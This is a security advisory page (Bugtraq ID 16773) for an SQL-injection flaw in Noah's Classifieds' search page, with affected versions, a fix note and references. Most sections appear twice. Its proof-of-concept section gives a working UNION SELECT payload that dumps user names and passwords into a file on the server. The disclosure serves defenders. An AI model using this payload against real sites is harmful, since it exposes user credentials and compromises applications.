Noah's Classifieds Search Page SQL Injection Vulnerability
BID:16773
Info
Noah's Classifieds Search Page SQL Injection Vulnerability
| Bugtraq ID: | 16773 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 22 2006 12:00AM |
| Updated: | Mar 02 2006 08:01AM |
| Credit: | trueend5 is credited with the discovery of this vulnerability. |
| Vulnerable: |
PhpOutsourcing Noah's Classifieds 1.3 Joomla Noah Classifieds 1.0.Beta2 Joomla Noah Classifieds 1.0.Beta1 |
| Not Vulnerable: |
Joomla Noah Classifieds 1.0.beta3 |
Discussion
Noah's Classifieds Search Page SQL Injection Vulnerability
Noah's Classifieds is prone to an SQL-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Note that to carry out an attack, the attacker must be a MySQL user with file permissions.
Noah's Classifieds is prone to an SQL-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Note that to carry out an attack, the attacker must be a MySQL user with file permissions.
Exploit / POC
Noah's Classifieds Search Page SQL Injection Vulnerability
No exploit is required.
An example has been provided:
Attacker uses a 'POST' request on the affected search page and supplies the following to the search field:
kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#
No exploit is required.
An example has been provided:
Attacker uses a 'POST' request on the affected search page and supplies the following to the search field:
kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#
Solution / Fix
Noah's Classifieds Search Page SQL Injection Vulnerability
Solution:
Joomla has released some updates to address this for the Joomla Noah component. See the reference section for further information.
Solution:
Joomla has released some updates to address this for the Joomla Noah component. See the reference section for further information.
References
Noah's Classifieds Search Page SQL Injection Vulnerability
References:
References:
- Beta 3 Release Page - please read (Joomla)
- Noah's Classifieds Web Site (Noah's Classifieds)
- [KAPDA::#29]Noah's classifieds multiple vulnerabilities (alireza hassani
) - Updated Noah Classifieds Component for Joomla!/Mambo ([email protected])